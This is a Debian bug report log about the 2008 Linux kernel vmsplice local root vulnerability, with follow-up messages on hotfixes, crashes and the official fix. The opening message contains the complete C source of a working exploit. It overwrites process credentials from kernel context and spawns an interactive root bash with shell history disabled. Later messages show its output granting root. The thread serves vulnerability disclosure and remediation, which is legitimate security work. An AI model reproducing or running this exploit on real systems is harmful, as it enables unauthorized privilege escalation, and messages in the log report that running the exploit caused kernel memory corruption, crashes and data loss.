Debian Bug report logs - #464953
linux-2.6: mmap() local root exploit

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: William Pitcock <nenolod@sacredspiral.co.uk>

To: Debian Bug Tracking System <submit@bugs.debian.org>

Subject: linux-2.6: mmap() local root exploit

Date: Sat, 09 Feb 2008 19:29:53 -0600

Package: linux-2.6
Version: 2.6.22-3-generic
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by
Debian, including Etch's kernel.

The attached exploit code can be used to test if a kernel is vulnerable,
it starts a root shell.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-generic (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

*** proof-of-concept.c
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}

Message #14 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Morten Hustveit <morten@rashbox.org>

To: 464953@bugs.debian.org

Subject: Hotfix

Date: Sun, 10 Feb 2008 20:38:05 +0100

Hi,

a modification of the exploit that finds the address of sys_vmsplice in the
kernel (using /proc/kallsyms) and replaces the first byte with a RET instruction
(using mmap of /dev/kmem) is available at

  http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c

-- 
Morten Hustveit

Message #21 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Ari Pollak <ari@debian.org>

To: 464953@bugs.debian.org

Subject: (no subject)

Date: Sun, 10 Feb 2008 17:00:15 -0500

Unofficial prebuilt packages are here:
http://134.2.34.20/blank/debian/linux-2.6/
as referenced here:
http://lists.debian.org/debian-kernel/2008/02/msg00363.html

Message #26 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Duncan Robertson <duncan@zog.net.au>

To: 464953@bugs.debian.org

Subject: hotfix possibly unstable?

Date: Mon, 11 Feb 2008 12:04:53 +1100

Just mentioning that the hotfix mentioned here:

http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c	

appeared to have wedged (crashed hard, frozen) my machine, an otherwise
very stable pentium 4 machine running 2.6.18-5-686 (with nvidia
oldstable xorg proprietry drivers). nothing in syslog, etc.

Message #31 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Duncan Robertson <duncan@zog.net.au>

To: 464953@bugs.debian.org

Subject: follow up information

Date: Mon, 11 Feb 2008 17:35:20 +1100

Just following up reported problem with security patch has not
re-occurred since rebooting (and rerunning fix), and no problem with 2
servers patched with disable-vmsplice-if-exploitable.c	either.
also I meant nvidia-kernel-legacy-96xx-2.6.18-5-686 not "oldstable" 

Message #36 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Michael Holzt <debian-bugreports@michael.holzt.de>

To: 464953@bugs.debian.org

Cc: Duncan Robertson <duncan@zog.net.au>

Subject: DO NOT USE THE HOTFIX!

Date: Mon, 11 Feb 2008 09:18:48 +0100

Just for the record: Do not use the "hotfix" named disable-vmsplice-if-
exploitable.c. The hotfix first tries to run the exploit (which would be 
totally unnecessary for the actual "fix" by the way and is therefore a
very dumb thing to do), and this still leads to kernel memory corruption
which will render the system unstable. You can imagine what might come
from corrupted kernel beside a simple crash (e.g. data loss).

It shall be possible to remove the actual exploit attempt from the "fix",
but seems to be another solution which apparently compiles to a kernel
module which will catch and report attempts to (ab)use vmsplice at
http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks

Message #43 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Jon Dowland <jon+bts@alcopop.org>

To: 464953@bugs.debian.org

Subject: exploit hung my machine

Date: Mon, 11 Feb 2008 09:29:29 +0000

The exploit code (rather than the hotfix, which I didn't
try) caused my laptop to hang (thinkpad x40 tracking sid,
one of the standard Debian kernel packages, no non-standard
modules, untainted kernel). I would not be suprised if the
reworked hotfix had the same bug in it.

We tried the hotfix on a Redhat Enterprise 5 machine at
work and that hung similarly.

The module solution Michael Holtz posted looks much safer.

-- 
Jon Dowland
ISS UNIX Team

Message #48 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Mircea Gherzan <mgherzan@rdslink.ro>

To: 464953@bugs.debian.org

Subject: seems to be fixed

Date: Mon, 11 Feb 2008 11:53:48 +0200

On a vanilla 2.6.24.2, the exploit no longer works:

-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e23000 .. 0xb7e55000
[-] vmsplice: Bad address

-- 
Mircea Gherzan
Faculty of Automatic Control and Computers
Politehnica University of Bucharest

Message #53 received at 464953@bugs.debian.org (full text, mbox, reply):

From: "Nikita V. Youshchenko" <yoush@cs.msu.su>

To: 464953@bugs.debian.org

Subject: ptpatch2008.c does not work

Date: Mon, 11 Feb 2008 13:00:35 +0300

> but seems to be another solution which apparently compiles to a kernel
> module which will catch and report attempts to (ab)use vmsplice at
> http://home.powertech.no/oystein/ptpatch2008/ptpatch2008.c

I've just tried to compile this module.
It successfully insmod'ed:

Feb 11 12:54:29 zigzag kernel: ptpatch2008: init, (c) 2008 
oystein@powertech.no
Feb 11 12:54:29 zigzag kernel: ptpatch2008: syscalls c02ea3c0
Feb 11 12:54:29 zigzag kernel: hooked sys_vmsplice

However exploit code from the top of 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953 still works:

nikita@zigzag:~/adm/hotfix> ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d97000 .. 0xb7dc9000
[+] root
root@zigzag:~/adm/hotfix> whoami
root

Message #60 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Asheesh Laroia <asheesh@asheesh.org>

To: 464953@bugs.debian.org

Subject: Fix released

Date: Mon, 11 Feb 2008 08:12:24 -0800 (PST)

See 
http://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00056.html 
.

apt-get your way to the beautiful fixed future.

-- Asheesh.

-- 
You may worry about your hair-do today, but tomorrow much peanut butter will
be sold.

Message #65 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Ivan Jager <aij+debian@andrew.cmu.edu>

To: 464953@bugs.debian.org

Subject: Amd64 hotfix

Date: Mon, 11 Feb 2008 13:54:35 -0500 (EST)

[Message part 1 (text/plain, inline)]

I modified the hotfix so it will also patch compat_sys_vmsplice, which 
would be important on amd64 boxen with x86 compatibility enabled.

It's attached, or if for some reason it doesn't make it through, you can 
fetch it from 
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c

Ivan

[disable-vmsplice-if-exploitable-aij.c (text/plain, attachment)]

Message #70 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Kyle McMartin <kyle@mcmartin.ca>

To: Ivan Jager <aij+debian@andrew.cmu.edu>, 464953@bugs.debian.org

Subject: Re: Bug#464953: Amd64 hotfix

Date: Mon, 11 Feb 2008 14:21:25 -0500

On Mon, Feb 11, 2008 at 01:54:35PM -0500, Ivan Jager wrote:
> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.
>

these "hotfixes" are so completely wrong, it's not even funny.
you're playing russian roulette with the return value.

   0:   b8 da ff ff ff          mov    $0xffffffda,%eax
   5:   c3                      retq   

is more correct (return -ENOSYS)

regards, kyle

Message #75 received at 464953@bugs.debian.org (full text, mbox, reply):

From: Michael Holzt <debian-bugreports@michael.holzt.de>

To: 464953@bugs.debian.org

Cc: Ivan Jager <aij+debian@andrew.cmu.edu>

Subject: Re: Amd64 hotfix

Date: Tue, 12 Feb 2008 01:08:26 +0100

> I modified the hotfix so it will also patch compat_sys_vmsplice, which 
> would be important on amd64 boxen with x86 compatibility enabled.

Once again: The "hotfix" and also your modification are stupid, stupid,
stupid and dangerous. The "hotfix" first attempts to try the exploit and
this corrupts kernel memory. It is very likely that your system will
crash shortly after and numerous people have reported that the "hotfix"
just has that result either instantaneous or after a short while.

Also while overwriting the vmsplice syscall with a "ret" will prevent 
the hole from being abused, this will also confuse software which wants
to use the vmsplice call. At least one should return with a error. I'm
not sure if there is any software in normal use which uses vmsplice but
keep this in mind.

And finally: If you really really want to use this kind of fix, why
don't you just get rid of all the dangerous exploit code and only keep
the code from inside the "de_exploit()" function and then call this
code as root? This would do the job without causing memory corruption.

But the best fix still is to just install a updated kernel and reboot.
As said, you will anyway (but at a random time), at least when using 
this stupid "hotfix" which destroys your kernel memory. There might be
systems which cannot be rebooted right now, but i most cases i feel
that people who wan't to apply such a hotfix instead of deploying a
clean solution are just lazy.


Regards
Michael

-- 
It's an insane world, but i'm proud to be a part of it. -- Bill Hicks

Message #80 received at 464953@bugs.debian.org (full text, mbox, reply):

From: n0p <lbernal@gmail.com>

To: 464953@bugs.debian.org

Subject: The exploit corrupted the system partition

Date: Tue, 12 Feb 2008 13:38:19 -0100

[Message part 1 (text/plain, inline)]

Just FYI
The exploit corrupted the system partition (reiserFS), a user in my server
tested the exploit and all the root got corrupted and impossible to recover.
It was a fully updated Debian Testing using the debian default kernel in a
fully stable pentium4 otherwise.

Next time i'll use the grsec patches and lock the fuck up of my users ¬¬

[Message part 2 (text/html, inline)]

Send a report that this bug log contains spam.